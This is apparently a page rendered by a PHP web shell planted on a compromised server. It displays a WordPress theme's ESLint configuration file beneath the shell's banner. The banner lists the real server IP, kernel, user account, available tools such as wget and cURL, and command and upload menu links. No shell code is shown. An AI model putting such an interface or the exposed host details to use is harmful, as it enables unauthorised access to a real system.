|
Server IP : 89.26.249.46 / Your IP : 216.73.216.42 Web Server : Apache System : Linux a.cp.cloudlink.pt 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64 User : eticalga ( 1129) PHP Version : 8.3.31 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/eticalga/www/files/themes/kobuxeticalgarve/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
{
"extends": ["plugin:@wordpress/eslint-plugin/recommended-with-formatting", "prettier"],
"env": {
"browser": true,
"es6": true
},
"rules": {
"@wordpress/no-global-event-listener": "off",
"@wordpress/no-wp-process-env": "off",
"no-console": "off",
"eqeqeq": "off",
"import/no-extraneous-dependencies": "off",
"import/no-unresolved": "off",
"import/named": "off",
"import/default": "off",
"camelcase": ["error", { "allow": ["_theme_config"] }],
"trailingComma": 0,
"no-unused-vars": 0,
"object-shorthand": 0
},
"settings": {
"import/resolver": {
"node": {
"extensions": [".js", ".jsx"]
}
}
},
"globals": {
"_theme_config": true,
"YT": true,
"Vimeo": true,
"webpHero": true,
"imagesLoaded": true,
"ajaxfilters": true,
"ga": true,
"gtag": true,
"fbq": true,
"gform": true
}
}